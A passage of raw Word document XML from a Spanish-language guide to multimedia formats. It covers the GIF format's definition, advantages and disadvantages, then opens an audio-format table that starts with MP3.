          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Acrónimo para Graphic Interchange Format que se traduce a Formato de Intercambio de Gráficos. Este tipo de formato se encuentra limitado a 256 colores. Aunque la cifra parece bastante alta, en la web en realidad es un número algo bajo ya que ciertas fotografías con detalle pueden tener miles de tonos distintos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Soporta imágenes de hasta 256 colores, que está muy bien, pero que para imágenes realísticas no es suficiente.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Permiten transparencias</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>El peso de los archivos es considerablemente menor al de un video, por lo que subirlo o descargarlo no</w:t>
            </w:r>
            <w:r w:rsidR="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> consume mucho.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Ayudan a construir una imagen moderna de tu negocio, donde a mayor alcance e interacción, la promoción se vuelve más interesante, atrayendo nuevos seguidores.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">Aumentan el tiempo de permanencia en tu </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>sitio gracias al “autoloop”.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>No sólo son fáciles de consumir, también son contenidos empáticos que ayudan a conectar con tus seguidores desde un enfoque emocional.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>En RRSS también se puede hacer uso de GIFs ya creados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Diseñarla toma más tiempo y recursos que una imagen fija en JPG, ya que se debe considerar la planificación y validación del relato junto a la ejecución de la imagen en distintos programas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">De todas maneras sigue siendo mucho más económico que un video, tanto en su </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ejecución como en la subida y carga.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>En campañas de mails, los problemas de compatibilidad de Outlook hacen que sólo aparezca el primer frame del GIF.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Lo recomendado es crear los archivos de tal manera que muestren la información más relevante en este espacio.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00006D88"/>
    <w:p w:rsidR="00006D88" w:rsidRPr="00006D88" w:rsidRDefault="00006D88" w:rsidP="00006D88"/>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc514520847"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Audio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00715745" w:rsidRDefault="00715745" w:rsidP="00715745"/>
    <w:p w:rsidR="00715745" w:rsidRDefault="00715745" w:rsidP="00715745"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula5oscura-nfasis5"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpX="-289" w:tblpY="15"/>
        <w:tblW w:w="13887"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ayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1176"/>
        <w:gridCol w:w="2016"/>
        <w:gridCol w:w="2048"/>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="3260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00236265" w:rsidRPr="00715745" w:rsidTr="003A29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87" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00C86F82" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C86F82">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>AUDIO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715745" w:rsidRPr="00C86F82" w:rsidTr="003A29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tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Formato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2048" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="006725F3" w:rsidP="006725F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="00715745" w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>efinición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="006725F3" w:rsidP="006725F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="00715745" w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>aracterísticas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="006725F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Ventajas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="006725F3" w:rsidP="006725F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="00715745" w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>esventajas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715745" w:rsidRPr="00C86F82" w:rsidTr="003A2989">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1176" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="006725F3" w:rsidRDefault="006725F3" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006725F3" w:rsidRDefault="006725F3" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006725F3" w:rsidRDefault="006725F3" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006725F3" w:rsidRDefault="006725F3" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
